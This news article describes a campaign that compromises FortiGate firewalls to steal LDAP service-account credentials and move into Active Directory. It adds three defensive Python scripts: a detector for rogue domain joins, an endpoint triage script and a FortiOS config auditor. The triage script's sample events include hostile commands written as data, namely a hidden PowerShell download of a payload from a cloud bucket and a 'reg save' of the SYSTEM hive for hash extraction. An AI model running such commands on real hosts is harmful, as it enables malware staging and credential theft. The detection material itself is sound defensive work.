FortiGate Devices Targeted in Cyber Attacks to Steal Service Account Credentials


Overview of the Threat Campaign

Cybersecurity researchers have raised alarms about a new campaign in which threat actors compromise FortiGate Next-Generation Firewall (NGFW) appliances to break into victim networks. The attackers gain access to the devices through recently disclosed vulnerabilities or weak credentials, then extract configuration files that contain service account credentials and network topology information. The campaign has primarily targeted sectors such as healthcare, government, and managed service providers.

Exploitation of Vulnerabilities

According to a report from SentinelOne, FortiGate appliances have broad access to the environments they are designed to protect. That access often includes service accounts tied to authentication infrastructure such as Active Directory (AD) and the Lightweight Directory Access Protocol (LDAP). Security researchers Alex Delamotte, Stephen Bromfield, Mary Braden Murphy, and Amey Patne noted that this integration lets the appliances map roles to specific users by analyzing connection attributes and correlating them with directory information, which can shorten response times for network security alerts.

The same access becomes a liability when attackers breach a FortiGate device, whether through known vulnerabilities such as CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858, or through misconfigurations.

Incident Reports

In November 2025, attackers reportedly compromised a FortiGate appliance and created a new local administrator account named "support." They used this account to add four new firewall policies that allowed unrestricted traffic between all zones. The attackers then checked back periodically to confirm the device remained accessible, a pattern consistent with initial access brokers (IABs), who establish footholds for resale to other criminal actors.

The next phase was detected in February 2026, when an attacker likely extracted a configuration file containing the encrypted credentials of the LDAP service account. Evidence showed the attacker authenticating to AD with the cleartext credentials of the fortidcagent service account, which implies the configuration file was decrypted to recover them. This is possible by design: the firewall must be able to recover the plaintext bind password to authenticate to LDAP, so the stored value is reversibly encrypted rather than hashed, and a configuration backup should be treated as credential material.

With these credentials, the attacker authenticated to the victim's environment and joined rogue workstations to the domain, creating a foothold for deeper access. The attacker then began network scanning, which triggered detection of the breach and halted further lateral movement.
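The rogue domain joins described above leave a record on the domain controllers: Windows Security event 4741 ("A computer account was created") names both the identity that created the computer object and the new computer name. The script below is an added example, not part of the SentinelOne report or this article. The event records are constructed, and the account names svc-autopilot and jdoe are assumptions; fortidcagent is the firewall's LDAP bind account from the incident, which should only ever bind to AD and never create computer objects.

```python
"""Flag rogue domain joins in Windows Security events (ID 4741).

Added example; events are constructed. Rules:
  * critical: a firewall bind account created a computer object,
  * warn: any identity outside the provisioning allowlist created one,
  * warn: several computer accounts created by one identity in a short burst.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FIREWALL_BIND_ACCOUNTS = {"fortidcagent"}   # from the incident
PROVISIONING_ACCOUNTS = {"svc-autopilot"}   # assumption: the only identity allowed to join machines
BURST_WINDOW = timedelta(minutes=10)

SAMPLE_EVENTS = [  # constructed; field names follow the 4741 schema
    {"EventID": 4624, "TimeCreated": "2026-02-03T08:00:10",
     "SubjectUserName": "fortidcagent", "TargetUserName": "fortidcagent"},   # a normal bind, ignored
    {"EventID": 4741, "TimeCreated": "2026-02-03T08:02:00",
     "SubjectUserName": "svc-autopilot", "TargetUserName": "WS-0451$"},      # legitimate join
    {"EventID": 4741, "TimeCreated": "2026-02-03T09:14:31",
     "SubjectUserName": "fortidcagent", "TargetUserName": "DESKTOP-RQ1$"},   # rogue
    {"EventID": 4741, "TimeCreated": "2026-02-03T09:17:05",
     "SubjectUserName": "fortidcagent", "TargetUserName": "DESKTOP-RQ2$"},   # rogue, same burst
    {"EventID": 4741, "TimeCreated": "2026-02-03T11:40:00",
     "SubjectUserName": "jdoe", "TargetUserName": "LAPTOP-X$"},              # ordinary user joining a machine
]


def detect_rogue_joins(events):
    """Return [(severity, message)] for suspicious computer-account creations."""
    findings, joins = [], defaultdict(list)
    for e in events:
        if e["EventID"] != 4741:
            continue
        who, what = e["SubjectUserName"], e["TargetUserName"]
        joins[who].append(datetime.fromisoformat(e["TimeCreated"]))
        if who.lower() in FIREWALL_BIND_ACCOUNTS:
            findings.append(("critical", f"{who} created computer {what}: bind account used to join a machine"))
        elif who.lower() not in PROVISIONING_ACCOUNTS:
            findings.append(("warn", f"{who} created computer {what}: non-provisioning identity"))
    # A burst of joins from one identity is typical of an attacker enrolling several hosts.
    for who, times in joins.items():
        times.sort()
        if any(b - a <= BURST_WINDOW for a, b in zip(times, times[1:])):
            findings.append(("warn", f"{who} created {len(times)} computer accounts within {BURST_WINDOW}"))
    return findings


if __name__ == "__main__":
    for severity, msg in detect_rogue_joins(SAMPLE_EVENTS):
        print(f"[{severity}] {msg}")
```

By default any authenticated user can create up to ten computer accounts (ms-DS-MachineAccountQuota), which is why a plain LDAP bind account can join machines at all; setting that quota to 0 and restricting joins to a dedicated provisioning identity turns the "warn" case into a hard failure for the attacker.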

Additional Attack Vectors

In a separate incident investigated in late January 2026, attackers moved quickly from firewall access to deploying remote access tools such as Pulseway and MeshAgent. They also used PowerShell to download malware from a cloud storage bucket hosted on Amazon Web Services (AWS) infrastructure. The Java-based malware, launched through DLL side-loading, was used to exfiltrate sensitive data to an external server over port 443, including the NTDS.dit Active Directory database and the SYSTEM registry hive, which holds the boot key needed to decrypt the password hashes stored in NTDS.dit.

While the actor may have attempted to crack password hashes from the harvested data offline, no use of the stolen credentials was identified between the time of harvesting and containment of the incident.

Delamotte indicated that the company's Digital Forensics and Incident Response (DFIR) team has observed similar techniques in other cases, such as staging files in USOShared paths. This points to a broader campaign in which FortiGate devices are only one of several initial access vectors.
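The second incident's host-side tradecraft (a PowerShell download from a cloud bucket, files staged under USOShared, a Java runtime launched from that staging path, unsanctioned remote-access agents, and collection of NTDS.dit and the SYSTEM hive) is the kind of activity endpoint telemetry can catch before exfiltration. The triage script below is an added example, not code from SentinelOne or the article. Its events are constructed in a Sysmon-like shape, and its rules are heuristics written for this example: the S3 hostname pattern, the list of unapproved RMM tools, and the `reg save` / ntds.dit patterns are assumptions, not indicators taken from the report.

```python
"""Triage host telemetry for the tradecraft seen in the second incident.

Added example; events are constructed. EventID 1 = process creation,
EventID 11 = file creation (Sysmon-style field names).
"""
import re

STAGING_DIR = "\\programdata\\usoshared\\"   # page: payloads staged under USOShared
UNAPPROVED_RMM = ("meshagent", "pulseway")  # assumption: neither tool is sanctioned here
PROGRAM_DIRS = ("c:\\program files",)       # covers 'Program Files' and 'Program Files (x86)'


def _img(e):  return e.get("Image", "").lower()
def _cmd(e):  return e.get("CommandLine", "").lower()
def _file(e): return e.get("TargetFilename", "").lower()


RULES = [
    ("PowerShell download from an S3 bucket", lambda e:
        e["EventID"] == 1 and _img(e).endswith("powershell.exe")
        and ".s3.amazonaws.com" in _cmd(e)            # assumption: bucket is S3
        and any(k in _cmd(e) for k in ("iwr", "invoke-webrequest", "downloadfile", "curl "))),
    ("executable staged under USOShared", lambda e:
        e["EventID"] == 11 and STAGING_DIR in _file(e)
        and _file(e).endswith((".exe", ".dll", ".jar"))),
    ("Java runtime running from a user-writable path (side-load host)", lambda e:
        e["EventID"] == 1 and _img(e).rsplit("\\", 1)[-1] in ("java.exe", "javaw.exe")
        and not _img(e).startswith(PROGRAM_DIRS)),
    ("unapproved remote-access agent", lambda e:
        e["EventID"] == 1 and any(k in _img(e) or k in _cmd(e) for k in UNAPPROVED_RMM)),
    ("AD database or SYSTEM hive access", lambda e:
        e["EventID"] == 1 and ("ntds.dit" in _cmd(e)
        or re.search(r"\breg(\.exe)?\s+save\s+hklm\\system\b", _cmd(e)) is not None)),
]

SAMPLE_EVENTS = [  # constructed
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"iwr https://upd-cache.s3.amazonaws.com/u.zip "
                    "-OutFile C:\\ProgramData\\USOShared\\u.zip\""},
    {"EventID": 11, "TargetFilename": "C:\\ProgramData\\USOShared\\java.exe"},
    {"EventID": 11, "TargetFilename": "C:\\ProgramData\\USOShared\\jli.dll"},
    {"EventID": 11, "TargetFilename": "C:\\ProgramData\\USOShared\\Logs\\EventLog.etl"},      # benign
    {"EventID": 1, "Image": "C:\\ProgramData\\USOShared\\java.exe", "CommandLine": "java.exe -jar u.jar"},
    {"EventID": 1, "Image": "C:\\Program Files\\Java\\bin\\java.exe",
     "CommandLine": "java -jar C:\\Apps\\tool.jar"},                                          # benign
    {"EventID": 1, "Image": "C:\\Program Files\\Mesh Agent\\MeshAgent.exe",
     "CommandLine": "MeshAgent.exe -install"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save HKLM\\SYSTEM C:\\ProgramData\\USOShared\\s.hiv"},
]


def triage(events):
    """Return [(rule name, image or file path)] for every event matching a rule."""
    hits = []
    for e in events:
        subject = e.get("Image") or e.get("TargetFilename")
        hits.extend((label, subject) for label, match in RULES if match(e))
    return hits


if __name__ == "__main__":
    for label, subject in triage(SAMPLE_EVENTS):
        print(f"{label}: {subject}")
```

The USOShared rule keys on file type rather than on the directory alone, because the legitimate directory holds Update Orchestrator logs and a path-only rule would fire on every host; the Java rule likewise ignores installs under Program Files, so it flags only a runtime copied next to a planted DLL.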

Distinct Attack Patterns

There is currently no evidence linking the two incidents to the same threat actor, as the post-compromise techniques differ significantly. The first incident involved joining rogue attacker workstations to AD, while the second followed a multi-stage lateral movement operation consistent with pre-ransomware activity. Both attacks were thwarted before any later-stage payloads could be deployed.

These findings underscore the ongoing threat to perimeter devices, which are increasingly targeted as initial access points for deeper compromises of enterprise networks. A common factor in both incidents was inadequate logging on the firewalls, which prevented investigators from determining how and when the attackers first gained access.

Recommendations for Organizations

Organizations are advised to retain at least 14 days of logs and to forward all logs to a Security Information and Event Management (SIEM) system. An off-device copy survives when an attacker deletes the firewall's local logs to cover their tracks.
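As an added example, not code from SentinelOne, Fortinet or this article, the following Python script audits a FortiOS configuration backup for the indicators from the November 2025 incident (the rogue "support" administrator and the any-to-any policies), lists the LDAP bind accounts whose passwords the file carries (the fortidcagent case) so they can be rotated, and checks the logging recommendation above. The configuration text is constructed; the parser follows the generic FortiOS config/edit/set/next/end layout, and the `log syslogd setting` and `private-data-encryption` checks refer to documented FortiOS settings that the article itself does not mention.

```python
"""Audit a FortiOS configuration backup (added example; constructed config).

Checks: admin accounts outside an allowlist, any-to-any accept policies,
LDAP bind accounts stored in the file, remote syslog status, and the
private-data-encryption global setting (the last two are FortiOS settings
from the CLI reference, not something the page cites).
"""
import shlex

SAMPLE_CONFIG = """\
config system global
    set hostname "fw-edge-01"
end
config system admin
    edit "admin"
        set accprofile "super_admin"
    next
    edit "support"
        set accprofile "super_admin"
    next
end
config user ldap
    edit "corp-ad"
        set username "CORP\\\\fortidcagent"
        set password ENC bm90LWEtcmVhbC1zZWNyZXQ=
    next
end
config firewall policy
    edit 1
        set name "lan-to-wan"
        set srcintf "port2"
        set dstintf "port1"
        set srcaddr "all"
        set dstaddr "all"
        set action accept
        set service "HTTPS"
    next
    edit 99
        set name "support-tmp"
        set srcintf "any"
        set dstintf "any"
        set srcaddr "all"
        set dstaddr "all"
        set action accept
        set service "ALL"
    next
end
config log syslogd setting
    set status disable
end
"""


def parse_fortios_config(text):
    """Return {section: [(entry_name, {key: [values]}), ...]}; section-level
    settings made without an 'edit' block are stored under entry None."""
    sections, stack = {}, []          # stack items: [section, entry, settings]
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        cmd, *args = shlex.split(line)
        if cmd == "config":
            name = " ".join(args)
            sections.setdefault(name, [])
            stack.append([name, None, {}])
        elif cmd == "edit":
            stack[-1][1], stack[-1][2] = args[0], {}
        elif cmd == "set":
            stack[-1][2][args[0]] = args[1:]
        elif cmd in ("next", "end"):
            name, entry, settings = stack[-1]
            if entry is not None or settings:
                sections[name].append((entry, settings))
            stack[-1][1], stack[-1][2] = None, {}
            if cmd == "end":
                stack.pop()
    return sections


WIDE_OPEN = {"srcintf": "any", "dstintf": "any", "srcaddr": "all", "dstaddr": "all"}


def first(s, key, default=""):
    return s.get(key, [default])[0]


def audit_config(text, expected_admins=("admin",)):
    cfg, findings = parse_fortios_config(text), []
    for name, s in cfg.get("system admin", []):
        if name not in expected_admins:
            findings.append(f"unexpected admin account {name!r} (profile {first(s, 'accprofile')})")
    for pid, s in cfg.get("firewall policy", []):
        if (all(first(s, k) == v for k, v in WIDE_OPEN.items())
                and first(s, "action") == "accept" and "ALL" in s.get("service", [])):
            findings.append(f"any-to-any accept policy {pid} ({first(s, 'name', 'unnamed')})")
    for name, s in cfg.get("user ldap", []):
        if "password" in s:   # the device must recover this in plaintext, so treat it as exposed
            findings.append(f"LDAP bind account {first(s, 'username')!r} ({name}): rotate if this file left the device")
    if not any(first(s, "status") == "enable" for _, s in cfg.get("log syslogd setting", [])):
        findings.append("remote syslog forwarding disabled: the firewall holds the only copy of its logs")
    if not any(first(s, "private-data-encryption") == "enable" for _, s in cfg.get("system global", [])):
        findings.append("private-data-encryption disabled: stored secrets use the default key")
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print("FINDING:", f)
```

Run it against a real backup with `audit_config(open(path).read())`. Enabling private-data-encryption does not make stored bind passwords unrecoverable, since the device still needs them in plaintext; it only replaces the default key with one you choose, so the rotation finding applies whenever a backup has left your control.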

NGFW appliances have become prevalent because of their network monitoring capabilities and their integration of firewall controls with identity sources such as AD. That same position makes them high-value targets for a range of threat actors, from state-aligned entities conducting espionage to financially motivated attackers engaged in ransomware.

As reported by thehackernews.com.
